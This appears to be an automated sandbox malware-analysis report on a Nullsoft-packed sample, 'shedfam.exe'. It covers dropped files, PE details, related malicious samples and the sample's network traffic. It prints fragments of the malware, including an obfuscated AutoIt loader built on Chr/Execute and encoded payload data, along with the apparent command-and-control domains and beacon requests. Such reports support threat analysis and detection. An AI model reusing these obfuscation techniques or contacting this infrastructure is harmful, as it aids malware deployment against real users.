	https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9	Get hash	malicious	Browse	3.124.173.63
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1	Get hash	malicious	Browse	3.120.60.67
	SkyNet.1448.exe	Get hash	malicious	Browse	15.222.3.19
YISUCLOUDLTD-AS-APYISUCLOUDLTDHK	SecuriteInfo.com.Exploit.CVE-2018-0798.4.18556.26388.rtf	Get hash	malicious	Browse	103.100.63.146
	payment copy_$31,400.exe	Get hash	malicious	Browse	154.209.7.241
	Lserskarers.exe	Get hash	malicious	Browse	154.213.29.126
	NEW ORDER.xls	Get hash	malicious	Browse	154.213.29.126
	pitUbg1Fc9.exe	Get hash	malicious	Browse	154.213.29.126
	TWO_MONTHS_SALARY_RECEIPT.exe	Get hash	malicious	Browse	154.213.29.16
	2W2wNDLhsl.exe	Get hash	malicious	Browse	154.213.29.16
	Group_invitation.exe	Get hash	malicious	Browse	154.213.29.16
	Group_IV.exe	Get hash	malicious	Browse	154.213.29.16
	Group_Invitation.exe	Get hash	malicious	Browse	154.213.29.16
	GROUP INVITATION.exe	Get hash	malicious	Browse	154.213.29.16
	CONFIRMAR DOCUMENTO DE PAGO.exe	Get hash	malicious	Browse	103.107.238.138
	sDeDgYPD12.elf	Get hash	malicious	Browse	154.209.6.29
	C0kXpdDmus.exe	Get hash	malicious	Browse	103.100.63.146
	doc_584589921482-939583064810.pdf.vbs	Get hash	malicious	Browse	154.213.28.166
	SecuriteInfo.com.Trojan.DownLoader44.65070.11978.exe	Get hash	malicious	Browse	154.213.29.16
	Yeni sipari#U015f _No.129099, pdf.exe	Get hash	malicious	Browse	103.100.63.209
	PO2204-00011.exe	Get hash	malicious	Browse	154.197.2.146

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\kmhbvf.exe	vbc.exe	Get hash	malicious	Browse
	Details List and Specification.exe	Get hash	malicious	Browse
	MCS-DECEMBER ORDER-PROJECT PDF.exe	Get hash	malicious	Browse
	fL6O9HHehH.exe	Get hash	malicious	Browse
	2211.exe	Get hash	malicious	Browse
	winlogon.exe	Get hash	malicious	Browse
	RFQ FILES DTD NOVEMBER 2022.xls	Get hash	malicious	Browse
	swiftX24-11-2022.xls	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exe	Get hash	malicious	Browse
	mko.exe	Get hash	malicious	Browse
	BL-SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse
	RPO-09876543456.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	SRNQ18pSff.exe	Get hash	malicious	Browse
	BankDetails(DTL202210).xls	Get hash	malicious	Browse
	0591364.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\hocjhpxqy.mm

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	66710
Entropy (8bit):	3.5882360502901314
Encrypted:	false
SSDEEP:	384:QvCbSUvegVHfqXqgdbn2irCAnbYv853oADrWdREGu/g74s65jniENIVfpWJ769Vs:tLriH9nEv8yAGo9rsm+VhFDs
MD5:	431EB080C0121588DF787ADE07921631
SHA1:	51225D617EB675000CD546296200A3394BE6E3E5
SHA-256:	E2D19473BB19AD0753170CBEB884714EC463E9F7836876F0174509FED54DFB6B
SHA-512:	C7CF3F965FE741D6D98E06BAE9EE12CEADF6FF93574E03DBC2B9EB9336B4A9C23285B3DC3BBCBCD9D8B21C6E91BB92FB65B2995205AB8AAA5794FDA3FC614136
Malicious:	false
Reputation:	low
Preview:	0xe9220FF4500BBBVFDA580462000064a13000FF4500BBBVFDA5804600008FF4500BBBVFDA58046b4FF4500BBBVFDA580460FF4500BBBVFDA580460c8b40FF4500BBBVFDA580460c8b008FF4500BBBVFDA58046b008FF4500BBBVFDA58046b4018FF4500BBBVFDA58046c35FF4500BBBVFDA580465FF4500BBBVFDA580468becFF4500BBBVFDA5804664a13FF4500BBBVFDA580460FF4500BBBVFDA5804600000056578bFF4500BBBVFDA58046400c8b7FF4500BBBVFDA5804680c8bf7ff7508FF4500BBBVFDA58046ff7FF4500BBBVFDA580466FF4500BBBVFDA580463FF4500BBBVFDA580460e81FF4500BBBVFDA58046201000085c07FF4500BBBVFDA5804640a8b363bf775FF4500BBBVFDA58046eb33c0ebFF4500BBBVFDA58046038b46285f5eFF4500BBBVFDA580465dFF4500BBBVFDA58046c2040FF4500BBBVFDA580460FF4500BBBVFDA58046558bec568b75FF4500BBBVFDA5804608ba26FF4500BBBVFDA580462FF4500BBBVFDA58046300005FF4500BBBVFDA580467eb0eFF4500BBBVFDA580468FF4500BBBVFDA58046bFF4500BBBVFDA58046caFF4500BBBVFDA58046dFF4500BBBVFDA580461e8c1FF4500BBBVFDA58046e10FF4500BBBVFDA5804674FF4500BBBVFDA580466FF4500BBBVFDA580460bFF4500BBBVFDA58046c803cf03dFF4500BBBVFDA5804610FF4500BBB

C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: vbc.exe, Detection: malicious, Browse Filename: Details List and Specification.exe, Detection: malicious, Browse Filename: MCS-DECEMBER ORDER-PROJECT PDF.exe, Detection: malicious, Browse Filename: fL6O9HHehH.exe, Detection: malicious, Browse Filename: 2211.exe, Detection: malicious, Browse Filename: winlogon.exe, Detection: malicious, Browse Filename: RFQ FILES DTD NOVEMBER 2022.xls, Detection: malicious, Browse Filename: swiftX24-11-2022.xls, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exe, Detection: malicious, Browse Filename: mko.exe, Detection: malicious, Browse Filename: BL-SHIPPING DOCUMENTS.exe, Detection: malicious, Browse Filename: RPO-09876543456.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SRNQ18pSff.exe, Detection: malicious, Browse Filename: BankDetails(DTL202210).xls, Detection: malicious, Browse Filename: 0591364.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nse13E9.tmp

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	data
Category:	dropped
Size (bytes):	1161271
Entropy (8bit):	7.006804288931609
Encrypted:	false
SSDEEP:	12288:ldtfUML9HQFpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawVx:lLsNT3E53Myyzl0hMf1tr7Caw8M0A
MD5:	5FF42BDDBCC182E0FCC90781FAD2728A
SHA1:	EAD63E8B5973CCE5218306D11BF622BCBDFE2A7F
SHA-256:	A003F5F08AAE6F3DF16215ED1EC97315A7DD79D4B3488F6D8114189B16ABB176
SHA-512:	0CF8E7376574478DE2C161CE96B2EBDC27996FE5E35EDA137579F915831EB5A101A4753A789BF35CBD9A20B6AAA50B8432F8465D60F32843D49A174AA74C2318
Malicious:	false
Reputation:	low
Preview:	........,...................I...............................................................................................................................................................................................................................................................J...............F...j...........................................................................................................................................#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\piqsiyngg.yfg

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.991287376939625
Encrypted:	true
SSDEEP:	3072:WKYGVE/xY13tv+Fm7mNamHwvyWiIwl0dxFtMO7i0b5WAL7m8GPRfZiMBV:+GVdtyLad0lMLb5bjTMBV
MD5:	DC7CD66F3A1B920FE91A5550F1B95608
SHA1:	C72EB7822DA4656A6F0A391847FE8A76564572E3
SHA-256:	DB73C93C0D9FC5B23B95D9CB5D8BD402914999BA59B3D6C90B4DAC8E7DC302E6
SHA-512:	3C030A853C7C345A3C93E53D015C51A91986AE4DB4AB13E4730C9FFB2EAAFBF62C65A5D11FBA21B810A6CDAAB3CAEBFE48CE36D960AF54294CB55D7F108101FE
Malicious:	false
Preview:	..R.1..$. .<.hj..@.....r.....x6....q..x9.\|.G.%..".........j.h..V..s....l.j.V....Z.j a......<.2m?gMZa).u5.O:.Z.b.......<..q....f..-.......T........Y..,M.H[..z......o....o.==...^...?.....j(H.8.....7.Z.o.).;.J........-.v...}.q.Dqe....~.G.........L.'6..0..Q..7B9.qV.8.....q9..x94\|.V.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o....FG.^....6...xZ.........^7y.g..)x10.........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.\|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o.==...^.]?.6d..x~...8.....^7y.g..).10J........-cp...}..Dqe...n..~.G......$.L.'6...Qh.7B9.q.x6....q..x9.\|.G.%.."........j...TV..x.2F..2.-.{6SCNU.`v..y...Y!.."....R<.0.G...........<.....c...+.cD.R.2/.+;.M.jR.....M.8#./.'o...h..o....o.==...^.]?.6d..x~...8.....^7y.g..).10J........

C:\Users\user\AppData\Local\Temp\wenvaisrl.au3

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	ASCII text, with very long lines (1182), with CRLF line terminators
Category:	dropped
Size (bytes):	6409
Entropy (8bit):	4.539976822490987
Encrypted:	false
SSDEEP:	48:Adcp3cMcpp4c/NenP+h+OqbQALctNfP7CRvNrgBRyKSPXPXtXtXdhVcGgypVdAyq:AdeLvoIP+gOqb5Y78NcCHy3mPgAe
MD5:	F94D60D73EEED59DB9C9EA910387DF5E
SHA1:	A7A5D3AD43B240813CA47DD550D0632E0CC1B846
SHA-256:	35D0A39DEB3A4CA1DD624D441359A320A89F044476BA5665EED31C4E51019C2C
SHA-512:	E6CE3DB8563F4ED6989562FA0FBB561DAEB9E022B72D6EB746AE1181B2018633C7F22A0F2AE591D14D794340AA54A4699480219266E9B81E04A1A1D67F8FA983
Malicious:	false
Preview:	Global $K30ry88 = 227429608..Global $X31w8rp1 = 1313542..Global $A324so = Chr..Global $P334kwt0hcp = Execute..Global $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6633-6550) & $A324so(6651-6550) & $A324so(6666-6550) & $A324so(6618-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6647-6550))..Global $B3232eqg0zi8 = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-6550) & $A324so(6667-6550) & $A324so(6649-6550) & $A324so(6666-6550) & $A324so(6617-6550) & $A324so(6664-6550) & $A324so(6651-6550) & $A324so(6647-6550) & $A324so(6666-6550) & $A324so(6651-6550))..Global $F3339x28s = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6617-6550) & $A324so(6647-6550) & $A324so(6658-6550) & $A324so(6658-65

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.818960528918014
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shedfam.exe
File size:	901270
MD5:	c0a85d86855b257b25572aa7d9d90381
SHA1:	ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256:	c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
SHA512:	373c768311b5385bb45c0558a1bc112c5c8b4d9cceeb5fa41577a5a4f3a936aff6745bf0d6ac3fdc84a17d3eb518cce5d1e4744cdfe64cd35e4478a8693fd11a
SSDEEP:	12288:Avy7P+vzXkpdeYfU+Ey0LOPmEBrNU4jMmrKJVNwysiebm4M4qXftsFf:yAmvgeYc+EAPmEVNSmObWy7eCn4OtsFf
TLSH:	1F1502517F04C5A2C51D19F6CBEFE16C92F28CA2190198336760BE2E3CFEF9268255B5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.]...RF..RG.pRF.]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

File Icon


Icon Hash:	5c1cf8c8e970f1c8

Static PE Info

General

Entrypoint:	0x40324f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ab6770b0a8635b9d92a5838920cfe770

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+14h], 00409130h
xor esi, esi
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B8h]
call dword ptr [004070B4h]
cmp ax, 00000006h
je 00007F0A94F2A453h
push ebx
call 00007F0A94F2D241h
cmp eax, ebx
je 00007F0A94F2A449h
push 00000C00h
call eax
push 004091E0h
call 00007F0A94F2D1C2h
push 004091D8h
call 00007F0A94F2D1B8h
push 004091CCh
call 00007F0A94F2D1AEh
push 0000000Dh
call 00007F0A94F2D211h
push 0000000Bh
call 00007F0A94F2D20Ah
mov dword ptr [00423F84h], eax
call dword ptr [00407034h]
push ebx
call dword ptr [00407270h]
mov dword ptr [00424038h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F538h
call dword ptr [00407160h]
push 004091C0h
push 00423780h
call 00007F0A94F2CE41h
call dword ptr [004070B0h]
mov ebp, 0042A000h
push eax
push ebp
call 00007F0A94F2CE2Fh
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73cc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x490d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4a	0x5e00	False	0.659906914893617	data	6.410763775060762	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x115e	0x1200	False	0.4466145833333333	data	5.142548180775325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b078	0x600	False	0.455078125	data	4.2252195571372315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2d000	0x490d0	0x49200	False	0.1362446581196581	data	2.9633699887836995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d310	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States
RT_ICON	0x6f338	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x718e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x72988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x73830	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x741b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x74a60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x75128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x75690	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x75af8	0x100	data	English	United States
RT_DIALOG	0x75bf8	0x11c	data	English	United States
RT_DIALOG	0x75d18	0x60	data	English	United States
RT_GROUP_ICON	0x75d78	0x84	data	English	United States
RT_MANIFEST	0x75e00	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll	GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 15:13:30.139664888 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.344316006 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.348556042 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.348653078 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.553149939 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580126047 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580183983 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:30.580450058 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.580521107 CET	49699	80	192.168.2.3	18.167.242.213
Nov 29, 2022 15:13:30.785156012 CET	80	49699	18.167.242.213	192.168.2.3
Nov 29, 2022 15:13:51.134776115 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.420519114 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.420717001 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.421838045 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.707523108 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719268084 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719347954 CET	80	49700	103.100.63.146	192.168.2.3
Nov 29, 2022 15:13:51.719506979 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:51.721504927 CET	49700	80	192.168.2.3	103.100.63.146
Nov 29, 2022 15:13:52.007050037 CET	80	49700	103.100.63.146	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 15:13:30.082436085 CET	49977	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:13:30.123944998 CET	53	49977	8.8.8.8	192.168.2.3
Nov 29, 2022 15:13:50.786351919 CET	57840	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:13:51.133874893 CET	53	57840	8.8.8.8	192.168.2.3
Nov 29, 2022 15:14:11.876477003 CET	57990	53	192.168.2.3	8.8.8.8
Nov 29, 2022 15:14:12.086411953 CET	53	57990	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 15:13:30.082436085 CET	192.168.2.3	8.8.8.8	0x1a2a	Standard query (0)	www.111lll.xyz	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:50.786351919 CET	192.168.2.3	8.8.8.8	0xd00a	Standard query (0)	www.73129.vip	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:11.876477003 CET	192.168.2.3	8.8.8.8	0xc8d8	Standard query (0)	www.autonomaat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	www.111lll.xyz	zksnp3mu.sktcks.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	zksnp3mu.sktcks.com	fbcuj92a.n.sktcks.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	fbcuj92a.n.sktcks.com		18.167.242.213	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:30.123944998 CET	8.8.8.8	192.168.2.3	0x1a2a	No error (0)	fbcuj92a.n.sktcks.com		18.167.194.182	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:13:51.133874893 CET	8.8.8.8	192.168.2.3	0xd00a	No error (0)	www.73129.vip		103.100.63.146	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		54.67.42.145	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		54.67.93.101	A (IP address)	IN (0x0001)	false
Nov 29, 2022 15:14:12.086411953 CET	8.8.8.8	192.168.2.3	0xc8d8	No error (0)	www.autonomaat.com		52.8.134.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.111lll.xyz

www.73129.vip

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49699	18.167.242.213	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 29, 2022 15:13:30.348653078 CET	103	OUT	GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1 Host: www.111lll.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 29, 2022 15:13:30.580126047 CET	103	IN	HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 14:13:30 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: Cheertech CDN X-Cache-Status: MISS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49700	103.100.63.146	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
